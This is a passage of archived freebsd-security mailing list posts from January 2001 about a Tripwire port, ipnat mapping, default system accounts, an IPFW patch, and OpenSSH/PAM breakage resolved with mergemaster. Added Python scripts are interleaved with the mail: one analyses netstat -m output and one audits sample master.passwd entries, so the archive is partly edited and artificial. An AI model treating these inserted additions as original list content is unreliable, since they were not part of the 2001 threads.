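            findings.append(f"{label}: {cur}/{mx} in use now ({cur_pct}%); "
                            "raise NMBCLUSTERS (or maxusers) and reboot")
        if peak >= mx:
            findings.append(f"{label}: peak {peak} reached the limit of {mx}; "
                            "the pool has been exhausted at least once since boot")
    denied = stats.get("denied", 0)
    if denied > 0:
        findings.append(f"{denied} allocation requests denied; this is what "
                        "surfaces as ENOBUFS, 'No buffer space available'")
    return findings


if __name__ == "__main__":
    for line in assess(parse_netstat_m(SAMPLE_NETSTAT_M)):
        print(line)
```

The point of checking peak and the denied counter separately from current use: a "30% used or so" reading taken after the flood has stopped says nothing about what happened during it, while peak and the denial count keep accumulating until the next reboot. To run it on a live box, pass the text of `netstat -m` to parse_netstat_m instead of the constructed sample.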
From owner-freebsd-security Wed Jan 24 11:47:41 2001
Date: Wed, 24 Jan 2001 20:47:07 +0100 (CET)
From: Paul Herman
Subject: tripwire-2.3 for FreeBSD!

Hi,

FYI, I've put together a patch against the (linux-centric) tripwire-2.3.0-src, so it can be compiled under FreeBSD. The source ain't pretty, and it's far from being /usr/port or "./configure" friendly, I suppose, but at least it works. You just need gmake, and have to edit src/Makefile.

I also fixed some -Wall messages, and needed to update STLport because of small -pthread problems, but it seems to work fine now with the patch.

I've tried contacting the guys at tripwire.org about this last weekend, but all mails bounce with a "554 Message looping (received 6 times)" error from relay.tripwire.com. :-P

Anyway, here's the patch (412K):

Patch:
http://www.frenchfries.net/paul/freebsd/tw.patch.gz

Original Tripwire source:
http://download.sourceforge.net/tripwire/tripwire-2.3.0-src.tar.gz

-Paul.

From owner-freebsd-security Wed Jan 24 12:25:48 2001
Date: Wed, 24 Jan 2001 18:35:23 +0100
From: Gerhard Sittig
To: freebsd-security@freebsd.org
Subject: Re: IPNAT
Organization: System Defenestrators Inc.

On Wed, Jan 24, 2001 at 14:22 +0000, Dennis Rand wrote:
>
> I'm trying to setup a network with internal ip's like
> 192.168.0.* but I have this problem that I also have 2
> webservers running on the inside with two external IPs attached
> to them, then it would be great if I could get them translated
> from internal IPs to external IPs and the other way around, so
> if someone wanted to contact the webservers the FreeBSD
> machine would translate the external IP to the specific
> internal machine.

Do something like

    man -k ipnat
    man 5 ipnat

or even better:

    man -a ipnat
    $PAGER /usr/src/contrib/ipfilter/rules/*

I guess the "bimap" keyword is what you're looking for. Otherwise it might be the "redir" keyword.

virtually yours    82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig     true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.
From owner-freebsd-security Wed Jan 24 12:42:23 2001
Date: Wed, 24 Jan 2001 15:42:04 -0500 (EST)
From: Will Andrews
To: Paul Herman
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: tripwire-2.3 for FreeBSD!

On Wed, Jan 24, 2001 at 08:47:07PM +0100, Paul Herman wrote:
> FYI, I've put together a patch against the (linux-centric)
> tripwire-2.3.0-src, so it can be compiled under FreeBSD. The source
> ain't pretty, and it's far from being /usr/port or "./configure"
> friendly, I suppose, but at least it works. You just need gmake, and
> have to edit src/Makefile.

So, are you going to submit this in ports form?
:-)

--
wca

From owner-freebsd-security Wed Jan 24 13:25:33 2001
Date: Wed, 24 Jan 2001 13:18:01 -0800
From: Lawrence Sica
Organization: Interactivate, Inc
To: Matt Chew Spence
Cc: Guillermo Leandro, freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG
Subject: Re: Default users and the passwords

Matt Chew Spence wrote:
>
> Another question in a similar vein:
>
> Which, if any (besides root and nobody, which are a given), of these
> default accounts are critical to the basic functionality of the box? Is
> there a list somewhere where I can match these phantom/daemon users to
> their functionality/dependencies? I'd just as soon blow away things I'll
> never use, (uucp, xten, etc), but I am loath to do so without a better
> understanding of the ramifications thereof....
>

The big issue is if it can break make worlds. Make world expects certain users and groups. If you're not running the services, star out the passwords and make sure they have a nologin shell. That's probably the safest bet.

--Larry

--
Lawrence Sica
-------------------------------------------
larry@interactivate.com
Systems Administrator - Interactivate, Inc.
http://www.interactivate.com
-------------------------------------------
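Lawrence's advice (star out the password, give the account a nologin shell, leave the entry in place so make world keeps finding the users it expects) and Matt's question about toor can be checked mechanically rather than by eye. The following is an added example, not FreeBSD code and not anything posted in the thread: it parses constructed master.passwd lines in the ten-field layout (name:password:uid:gid:class:change:expire:gecos:home:shell) and reports uid 0 accounts other than root, system accounts whose password field is empty or holds a hash, and system accounts with a login shell other than nologin. SYSTEM_UID_MAX, NOLOGIN_SHELLS, the sample entries and the placeholder hash are assumptions of the example.

```python
from typing import List, NamedTuple

# Hypothetical policy constants for this example (not FreeBSD defaults):
# uids at or below SYSTEM_UID_MAX are treated as pseudo/daemon accounts.
SYSTEM_UID_MAX = 999
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/nonexistent"}

# Constructed master.passwd lines in the ten-field FreeBSD layout. The root
# password field is a placeholder, not a real hash. toor has a starred
# password and an empty shell field (which means /bin/sh); www has an empty
# password field, the case Lawrence's advice is meant to catch.
SAMPLE_MASTER_PASSWD = """\
# constructed sample, not a real system file
root:$1$PLACEHOLDER$PLACEHOLDERPLACEHOLDER:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
www::80:80::0:0:World Wide Web Owner:/nonexistent:/sbin/nologin
"""


class Entry(NamedTuple):
    name: str
    password: str
    uid: int
    gid: int
    shell: str


class Finding(NamedTuple):
    name: str
    severity: str
    message: str


def parse_master_passwd(text: str) -> List[Entry]:
    """Parse master.passwd text, keeping only the fields the audit needs."""
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 10:
            raise ValueError(f"malformed master.passwd line: {raw!r}")
        entries.append(Entry(fields[0], fields[1], int(fields[2]), int(fields[3]), fields[9]))
    return entries


def is_locked(password: str) -> bool:
    # A field starting with "*" (or "!") can never match a hash, so the
    # account cannot be logged into with a password.
    return password.startswith("*") or password.startswith("!")


def audit(entries: List[Entry]) -> List[Finding]:
    """Report the conditions the thread discusses; the file is never modified."""
    findings: List[Finding] = []
    for e in entries:
        locked = is_locked(e.password)
        # Any uid 0 besides root (toor, for instance) deserves a look; starred out is acceptable.
        if e.uid == 0 and e.name != "root":
            if locked:
                findings.append(Finding(e.name, "info", "extra uid 0 account, password starred out"))
            else:
                findings.append(Finding(e.name, "high", "extra uid 0 account with a usable password"))
        if e.name == "root" or e.uid > SYSTEM_UID_MAX:
            continue
        if e.password == "":
            findings.append(Finding(e.name, "high", "system account with an empty password field (no password needed)"))
        elif not locked:
            findings.append(Finding(e.name, "medium", "system account carries a password hash; star it out if the service is unused"))
        if e.shell not in NOLOGIN_SHELLS:
            shown = e.shell or "/bin/sh (empty shell field)"
            findings.append(Finding(e.name, "low", f"login shell is {shown}; use nologin unless the service needs it"))
    return findings


if __name__ == "__main__":
    for f in audit(parse_master_passwd(SAMPLE_MASTER_PASSWD)):
        print(f"{f.severity:6} {f.name:10} {f.message}")
```

Run against the real file by reading /etc/master.passwd (root-only) into parse_master_passwd. The script deliberately only reports: uucp's uucico shell is flagged "low" because it is a legitimate daemon shell where the service is in use, and removing entries outright is not suggested because of the make world dependency Lawrence notes.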
From owner-freebsd-security Wed Jan 24 15:15:37 2001
From: "Scott Hilton"
Subject: Problems with IPFW patch
Date: Wed, 24 Jan 2001 15:14:45 -0800

Greetings,

I'm running FreeBSD 4.2 and having some problems after applying the latest IPFW patch. I'm getting the following errors when restarting FreeBSD:

ip_fw_ctl: empty interface name
ipfw: getsockopt(IP_FW_ADD): Invalid argument
ip_fw_ctl: dst range set but n_dst_p=0

These three messages repeat multiple times. My rc.firewall hasn't changed since before I installed the ipfw patch, and the interface it's trying to use (rl0) is a valid interface. Anyone know what's up? I tried cvsupping and build/install world, but nothing changed..

Scott

From owner-freebsd-security Wed Jan 24 15:43:58 2001
From: "Scott Raymond"
Subject: RE: Problems with IPFW patch
Date: Wed, 24 Jan 2001 15:43:28 -0800

You must have done what I did - make world with a recent cvsup source tree update. You need to recompile and install the new kernel as well.

My own problem is with OpenSSH. The default one from the core system compile of make world no longer works. I had to disable it and use the ports tree version from /usr/ports/security/openssh.

--
Scott

=======================
Scott Raymond
http://soundamerica.com
=======================

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Scott Hilton
> Sent: Wednesday, January 24, 2001 3:15 PM
> To: freebsd-security@freebsd.org
> Subject: Problems with IPFW patch
>
> Greetings,
>
> I'm running FreeBSD 4.2 and having some problems after applying the latest
> IPFW patch. I'm getting the following errors when restarting FreeBSD:
>
> ip_fw_ctl: empty interface name
> ipfw: getsockopt(IP_FW_ADD): Invalid argument
> ip_fw_ctl: dst range set but n_dst_p=0
>
> These three messages repeat multiple times. My rc.firewall hasn't changed
> since before I installed the ipfw patch, and the interface it's trying to use
> (rl0) is a valid interface. Anyone know what's up? I tried cvsupping and
> build/install world, but nothing changed..
>
> Scott

From owner-freebsd-security Wed Jan 24 16:29:37 2001
From: "Scott Hilton"
Subject: FW: Problems with IPFW patch
Date: Wed, 24 Jan 2001 16:28:46 -0800

Yup, rebuilding the kernel did fix the problem, so that was it. Just wanted to forward this message to the list in case anyone else has this problem after installing the ipfw patch. Thanks for the assistance..

Scott

-----Original Message-----
From: Scott Hilton [mailto:kupek@earthlink.net]
Sent: Wednesday, January 24, 2001 3:51 PM
To: scott@link-net.com
Subject: RE: Problems with IPFW patch

I had rebuilt my kernel after upgrading to 4.2, and the error messages I was getting were occurring before I ever did a makeworld, so I'm not sure if that is it or not. However, I am in the middle of a build/installkernel now, so we'll see if that takes care of the problem..

Scott

-----Original Message-----

You must have done what I did - make world with a recent cvsup source tree update. You need to recompile and install the new kernel as well.

My own problem is with OpenSSH. The default one from the core system compile of make world no longer works. I had to disable it and use the ports tree version from /usr/ports/security/openssh.

From owner-freebsd-security Wed Jan 24 16:56:00 2001
From: "Scott Raymond"
Subject: OpenSSH b0rked (was RE: Problems with IPFW patch)
Date: Wed, 24 Jan 2001 16:55:38 -0800

Yeah, now if I could just figure out what was wrong with the openssh implementation in the core system. Openssh (ports tree version) has an annoying install sequence - you can't define where it gets installed, so the files get installed to the hard-coded directory tree /usr/local. The non-working core system one normally installs sshd to /usr/sbin and the config files to /etc/ssh.

What bugs me is that when this gets fixed it's going to take another 4 hours of compiling and installing. Bah.

--
Scott

=======================
Scott Raymond
http://soundamerica.com
=======================

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Scott Hilton
> Sent: Wednesday, January 24, 2001 4:29 PM
> To: scott@link-net.com; freebsd-security@freebsd.org
> Subject: FW: Problems with IPFW patch
>
> Yup, rebuilding the kernel did fix the problem, so that was
> it. Just wanted to forward this message to the list in case anyone else has
> this problem after installing the ipfw patch. Thanks for the assistance..
>
> Scott
>
> -----Original Message-----
> From: Scott Hilton [mailto:kupek@earthlink.net]
> Sent: Wednesday, January 24, 2001 3:51 PM
> To: scott@link-net.com
> Subject: RE: Problems with IPFW patch
>
> I had rebuilt my kernel after upgrading to 4.2, and the error
> messages I was getting were occurring before I ever did a makeworld, so I'm
> not sure if that is it or not. However, I am in the middle of a
> build/installkernel now, so we'll see if that takes care of the problem..
>
> Scott
>
> -----Original Message-----
>
> You must have done what I did - make world with a recent cvsup source
> tree update. You need to recompile and install the new kernel as well.
>
> My own problem is with OpenSSH. The default one from the core system
> compile of make world no longer works. I had to disable it and use the
> ports tree version from /usr/ports/security/openssh.

From owner-freebsd-security Wed Jan 24 18:31:50 2001
Date: Wed, 24 Jan 2001 18:34:57 -0800
From: Kris Kennaway
To: Scott Raymond
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)

On Wed, Jan 24, 2001 at 04:55:38PM -0800, Scott Raymond wrote:
> Yeah, now if I could just figure out what was wrong with the openssh
> implementation in the core system. Openssh (ports tree version) has an
> annoying install sequence - you can't define where it gets installed, so
> the files get installed to the hard-coded directory tree /usr/local.
> The non-working core system one normally installs sshd to /usr/sbin and
> the config files to /etc/ssh.

Perhaps if you posted an actual error..? :)

Dusting off my magic crystal ball, I predict you aren't using the official upgrade procedure which involves running mergemaster (and haven't read the reminder notice in /usr/src/UPDATING), and have an out of date /etc/pam.conf.
Kris

--
NOTE: To fetch an updated copy of my GPG key which has not expired,
finger kris@FreeBSD.org

From owner-freebsd-security Wed Jan 24 18:33: 1 2001
Date: Wed, 24 Jan 2001 18:36:08 -0800
From: Kris Kennaway
To: Scott Raymond
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Problems with IPFW patch
Message-ID: <20010124183608.C45221@citusc17.usc.edu>

On Wed, Jan 24, 2001 at 03:43:28PM -0800, Scott Raymond wrote:
> You must have done what I did - make world with a recent cvsup source
> tree update. You need to recompile and install the new kernel as well.

Do you mean that you tried just recompiling and reloading the module as
described in the advisory, and it didn't work, or that you didn't touch the
kernel at all, only rebuild ipfw(8)?

Kris

--
NOTE: To fetch an updated copy of my GPG key which has not expired,
finger kris@FreeBSD.org

From owner-freebsd-security Wed Jan 24 18:36:57 2001
From: "Scott Hilton"
Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch)
Date: Wed, 24 Jan 2001 18:36:14 -0800

What's wrong with OpenSSH? The only problem I encountered with it was the
following message when trying to start it:

fatal: ConnectionsPerPeriod has been deprecated

I was looking around for a few minutes, and found the following:

=================================================================
= Changes from previous versions                                =
=================================================================

2.3.0:
  We link with OpenSSL 0.9.6 now.

  Diffs from the FreeBSD version are not distributed right now (but will be).

  ConnectionsPerPeriod is currently not integrated.
  Consider using MaxStartups instead. If you still need
  ConnectionsPerPeriod, bug me and I may do it.

I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config and sshd loaded
without any problems.

-----Original Message-----
Yeah, now if I could just figure out what was wrong with the openssh
implementation in the core system. Openssh (ports tree version) has an
annoying install sequence - you can't define where it gets installed, so
the files get installed to the hard-coded directory tree /usr/local.
The non-working core system one normally installs sshd to /usr/sbin and
the config files to /etc/ssh.

What bugs me is that when this gets fixed it's going to take another 4
hours of compiling and installing.

Bah.
--
Scott

From owner-freebsd-security Wed Jan 24 19: 2:31 2001
From: "Scott Raymond"
Subject: RE: Problems with IPFW patch
Date: Wed, 24 Jan 2001 19:02:10 -0800
In-Reply-To: <20010124183608.C45221@citusc17.usc.edu>

Not at all. I had planned on recompiling the kernel. I have kern.securelevel
set to 2, so I need to reboot to single user mode in order to do the make
installworld. So I saw the same ipfw errors he did when I rebooted. After
the kernel recompile was done, the errors went away.

I did the cvsup update because I saw the update posted to the list. I also
recalled that firewalling support is in the kernel itself, so the make world
had to be accompanied by a kernel recompile.

--
Scott
=======================
Scott Raymond
http://soundamerica.com
=======================

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway
> Sent: Wednesday, January 24, 2001 6:36 PM
> To: Scott Raymond
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: Problems with IPFW patch
>
> On Wed, Jan 24, 2001 at 03:43:28PM -0800, Scott Raymond wrote:
> > You must have done what I did - make world with a recent cvsup source
> > tree update. You need to recompile and install the new kernel as well.
>
> Do you mean that you tried just recompiling and reloading the module
> as described in the advisory, and it didn't work, or that you didn't
> touch the kernel at all, only rebuild ipfw(8)?
>
> Kris
>
> --
> NOTE: To fetch an updated copy of my GPG key which has not expired,
> finger kris@FreeBSD.org

From owner-freebsd-security Wed Jan 24 19: 9:52 2001
From: "Scott Raymond"
To: "Scott Hilton"
Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch)
Date: Wed, 24 Jan 2001 19:09:32 -0800

Oh, crap. That's EXACTLY what was happening.

Looks like it's time for another compile. Duh.

--
Scott
=======================
Scott Raymond
http://soundamerica.com
=======================

> -----Original Message-----
> From: Scott Hilton [mailto:kupek@earthlink.net]
> Sent: Wednesday, January 24, 2001 6:36 PM
> To: scott@link-net.com; freebsd-security@freebsd.org
> Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch)
>
> What's wrong with OpenSSH? The only problem I encountered with it was the
> following message when trying to start it:
>
> fatal: ConnectionsPerPeriod has been deprecated
>
> I was looking around for a few minutes, and found the following:
>
> =================================================================
> = Changes from previous versions                                =
> =================================================================
>
> 2.3.0:
>   We link with OpenSSL 0.9.6 now.
>
>   Diffs from the FreeBSD version are not distributed right now (but will be).
>
>   ConnectionsPerPeriod is currently not integrated.
>   Consider using MaxStartups instead. If you still need
>   ConnectionsPerPeriod, bug me and I may do it.
>
> I commented out ConnectionsPerPeriod in /etc/ssh/sshd_config and sshd loaded
> without any problems.
>
> -----Original Message-----
> Yeah, now if I could just figure out what was wrong with the openssh
> implementation in the core system. Openssh (ports tree version) has an
> annoying install sequence - you can't define where it gets installed, so
> the files get installed to the hard-coded directory tree /usr/local.
> The non-working core system one normally installs sshd to /usr/sbin and
> the config files to /etc/ssh.
>
> What bugs me is that when this gets fixed it's going to take another 4
> hours of compiling and installing.
>
> Bah.
> --
> Scott

From owner-freebsd-security Wed Jan 24 21:33:52 2001
Message-Id: <200101250533.f0P5X4964941@harmony.village.org>
From: Warner Losh
To: Fernando Schapachnik
Cc: Mark Murray, "David J. MacKenzie", freebsd-security@FreeBSD.ORG
Subject: Re: full PAM support for login, rshd, and su
In-reply-to: Your message of "Thu, 18 Jan 2001 11:11:46 -0300." <200101181411.LAA86494@ns1.via-net-works.net.ar>
Date: Wed, 24 Jan 2001 22:33:04 -0700

In message <200101181411.LAA86494@ns1.via-net-works.net.ar> Fernando Schapachnik writes:
: Anyway, it appears that the current ftpd is going to be replaced by
: the NetBSD ftpd in a few days.

No. It isn't. There are lots of issues to work out before that happens.

Warner

From owner-freebsd-security Wed Jan 24 22:51:17 2001
From: "Scott Raymond"
To: "Scott Hilton"
Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch)
Date: Wed, 24 Jan 2001 22:50:54 -0800

Yes, once I was finished I ran into the same problem. I did a bit of
research - copy /usr/src/etc/pam.conf to /etc/pam.conf - overwriting your
old one. That fixed it for me - and all that was needed for the fix was the
config file. No reboots or restarting sshd necessary.

--
Scott
=======================
Scott Raymond
http://soundamerica.com
=======================

> -----Original Message-----
> From: Scott Hilton [mailto:kupek@earthlink.net]
> Sent: Wednesday, January 24, 2001 7:32 PM
> To: scott@link-net.com
> Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch)
>
> hey, I just got another error when trying to log into sshd... getting "no
> modules loaded for 'sshd' service" and "fatal: PAM session setup failed(6):
> Permission denied"
>
> Let me know if you get the same thing...
>
> -----Original Message-----
> From: Scott Raymond [mailto:scott@link-net.com]
> Sent: Wednesday, January 24, 2001 7:10 PM
> To: Scott Hilton; freebsd-security@freebsd.org
> Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch)
>
> Oh, crap. That's EXACTLY what was happening.
>
> Looks like it's time for another compile. Duh.
>
> --
> Scott
> =======================
> Scott Raymond
> http://soundamerica.com
> =======================

From owner-freebsd-security Wed Jan 24 23: 3:15 2001
Date: Wed, 24 Jan 2001 23:06:26 -0800
From: Kris Kennaway
To: Scott Raymond
Cc: Scott Hilton, freebsd-security@FreeBSD.ORG
Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)
Message-ID: <20010124230626.A49802@citusc17.usc.edu>

On Wed, Jan 24, 2001 at 07:09:32PM -0800, Scott Raymond wrote:
> Oh, crap. That's EXACTLY what was happening.
>
> Looks like it's time for another compile. Duh.

No, it's a configuration directive.

Kris

> > following message when trying to start it:
> >
> > fatal: ConnectionsPerPeriod has been deprecated

--
NOTE: To fetch an updated copy of my GPG key which has not expired,
finger kris@FreeBSD.org

From owner-freebsd-security Thu Jan 25 1: 7:47 2001
Date: Thu, 25 Jan 2001 10:07:29 +0100
From: Me
To: freebsd-security@freebsd.org
Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)
Message-ID: <20010125100729.A26350@www-student.eit.ihk.dk>

Use mergemaster ..

I find it too risky to just do a blind copy..

Soren.

On Wed, Jan 24, 2001 at 10:50:54PM -0800, Scott Raymond wrote:
> Yes, once I was finished I ran into the same problem. I did a bit of
> research - copy /usr/src/etc/pam.conf to /etc/pam.conf - overwriting
> your old one. That fixed it for me - and all that was needed for the
> fix was the config file. No reboots or restarting sshd necessary.
>
> --
> Scott
> =======================
> Scott Raymond
> http://soundamerica.com
> =======================

From owner-freebsd-security Thu Jan 25 1:25:32 2001
From: "Scott Raymond"
To: "Me"
Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch)
Date: Thu, 25 Jan 2001 01:25:08 -0800
In-Reply-To: <20010125100729.A26350@www-student.eit.ihk.dk>

I had kept that in mind before I did so. In fact, the research I did
suggested that I compare the file from the source tree and the existing one
in /etc and make changes to the one in /etc. I discovered that instead of
editing the old one, it was simply easier to just copy the file over from
the source path since the only difference was the addition of sshd entries.

--
Scott
=======================
Scott Raymond
http://soundamerica.com
=======================

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Me
> Sent: Thursday, January 25, 2001 1:07 AM
> To: freebsd-security@freebsd.org
> Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)
>
> Use mergemaster ..
>
> I find it too risky to just do a blind copy..
>
> Soren.
>
> On Wed, Jan 24, 2001 at 10:50:54PM -0800, Scott Raymond wrote:
> > Yes, once I was finished I ran into the same problem. I did a bit of
> > research - copy /usr/src/etc/pam.conf to /etc/pam.conf - overwriting
> > your old one. That fixed it for me - and all that was needed for the
> > fix was the config file. No reboots or restarting sshd necessary.
> >
> > --
> > Scott

From owner-freebsd-security Thu Jan 25 1:45: 6 2001
Date: Thu, 25 Jan 2001 11:42:29 +0200
From: Peter Pentchev
To: Scott Raymond
Cc: Me, freebsd-security@freebsd.org
Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)
Message-ID: <20010125114228.B578@ringworld.oblivion.bg>

You'd be better off running mergemaster anyway, after (or before) EVERY
world build/install cycle. Now God only knows how far your /etc has strayed
from the updated one, and how many programs may break or malfunction in
subtle ways :)

G'luck,
Peter

--
What would this sentence be like if pi were 3?

On Thu, Jan 25, 2001 at 01:25:08AM -0800, Scott Raymond wrote:
> I had kept that in mind before I did so. In fact, the research I did
> suggested that I compare the file from the source tree and the existing
> one in /etc and make changes to the one in /etc. I discovered that
> instead of editing the old one, it was simply easier to just copy the
> file over from the source path since the only difference was the
> addition of sshd entries.
>
> --
> Scott
> =======================
> Scott Raymond
> http://soundamerica.com
> =======================

From owner-freebsd-security Thu Jan 25 2:36:27 2001
From: "Scott Raymond"
To: "Peter Pentchev"
Cc: "Me"
Subject: RE: OpenSSH b0rked (was RE: Problems with IPFW patch)
Date: Thu, 25 Jan 2001 02:36:05 -0800
In-Reply-To: <20010125114228.B578@ringworld.oblivion.bg>

Just did that as per your suggestion. I did a "mergemaster -a -i", and
followed the instructions in the FreeBSD handbook for updating /dev and
/stand. Seems to have worked out pretty well, and everything is up to date.

--
Scott
=======================
Scott Raymond
http://soundamerica.com
=======================

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter Pentchev > Sent: Thursday, January 25, 2001 1:42 AM > To: Scott Raymond > Cc: Me; freebsd-security@freebsd.org > Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) > > > You'd be better off running mergemaster anyway, after (or before) > EVERY world build/install cycle. Now God only knows how far your /etc > has strayed from the updated one, and how many programs may break or > malfunction in subtle ways :) > > G'luck, > Peter > > -- > What would this sentence be like if pi were 3? > > On Thu, Jan 25, 2001 at 01:25:08AM -0800, Scott Raymond wrote: > > I had kept that in mind before I did so. In fact, the > research I did > > suggested that I compare the file from the source tree and > the existing > > one in /etc and make changes to the one in /etc. I discovered that > > instead of editing the old one, it was simply easier to > just copy the > > file over from the source path since the only difference was the > > addition of sshd entries. > > > > -- > > Scott > > ======================= > > Scott Raymond > > http://soundamerica.com > > =======================
From owner-freebsd-security Thu Jan 25 3: 7:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from dirac.th.physik.uni-bonn.de (dirac.th.physik.uni-bonn.de [131.220.161.119]) by hub.freebsd.org (Postfix) with SMTP id A0B6637B699 for ; Thu, 25 Jan 2001 03:07:04 -0800 (PST) Received: (qmail 70104 invoked from network); 25 Jan 2001 11:06:58 -0000 Received: from merlin.th.physik.uni-bonn.de (131.220.161.121) by dirac.th.physik.uni-bonn.de with SMTP; 25 Jan 2001 11:06:58 -0000 Received: (qmail 97336 invoked by uid 145); 25 Jan 2001 11:06:58 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jan 2001 11:06:58 -0000 Date: Thu, 25 Jan 2001 12:06:57 +0100 (CET)
From: Jan Conrad To: freebsd-security@freebsd.org Subject: Where did FreeBSD-SA-01:07 and 10 go? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi there, I am subscribed to freebsd-security, freebsd-announce and Bugtraq. On Bugtraq two security announcements appeared: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 FreeBSD Security Advisory: FreeBSD-SA-01:10.bind However, they did *NOT* - up to now - appear on the freebsd mailing lists. Did anybody else observe this? ciao Jan -- Physikalisches Institut der Universitaet Bonn Nussallee 12 D-53115 Bonn GERMANY From owner-freebsd-security Thu Jan 25 4:11:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw2.dnepr.net (CoreGW2-TBone.dnepr.net [195.24.156.97]) by hub.freebsd.org (Postfix) with ESMTP id ACF7437B400 for ; Thu, 25 Jan 2001 04:10:51 -0800 (PST) Received: from dnepr.net (dnepr.net [195.24.156.98]) by gw2.dnepr.net (8.8.8/8.6.18/01) with ESMTP id OAA29455; Thu, 25 Jan 2001 14:10:26 +0200 (EET) Received: (from land@localhost) by dnepr.net (8.8.8/8.8.8) id OAA17358; Thu, 25 Jan 2001 14:10:20 +0200 (EET) Date: Thu, 25 Jan 2001 14:10:20 +0200
From: Andrey Lakhno To: Jan Conrad Cc: security@freebsd.org Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? Message-ID: <20010125141020.A16114@dnepr.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from conrad@th.physik.uni-bonn.de on Thu, Jan 25, 2001 at 12:06:57 +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Jan! On Thu, 25 Jan 2001, Jan Conrad wrote: > Hi there, > > I am subscribed to freebsd-security, freebsd-announce and Bugtraq > > On Bugtraq two security announcements appeared: > > FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > FreeBSD Security Advisory: FreeBSD-SA-01:10.bind > > However, they did *NOT* - up to now - appear on the freebsd mailing lists. > > > Did anybody else observe this?? I did. -- Best regards, Andrey From owner-freebsd-security Thu Jan 25 6:20: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id C2E2B37B401 for ; Thu, 25 Jan 2001 06:19:38 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA08303; Thu, 25 Jan 2001 06:18:12 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda08301; Thu Jan 25 06:18:00 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f0PEHtY07632; Thu, 25 Jan 2001 06:17:55 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdpu7630; Thu Jan 25 06:17:21 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.2/8.9.1) id f0PEHKk14619; Thu, 25 Jan 2001 06:17:20 -0800 (PST) Message-Id: <200101251417.f0PEHKk14619@cwsys.cwsent.com> Received: from
localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdg14607; Thu Jan 25 06:17:10 2001 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
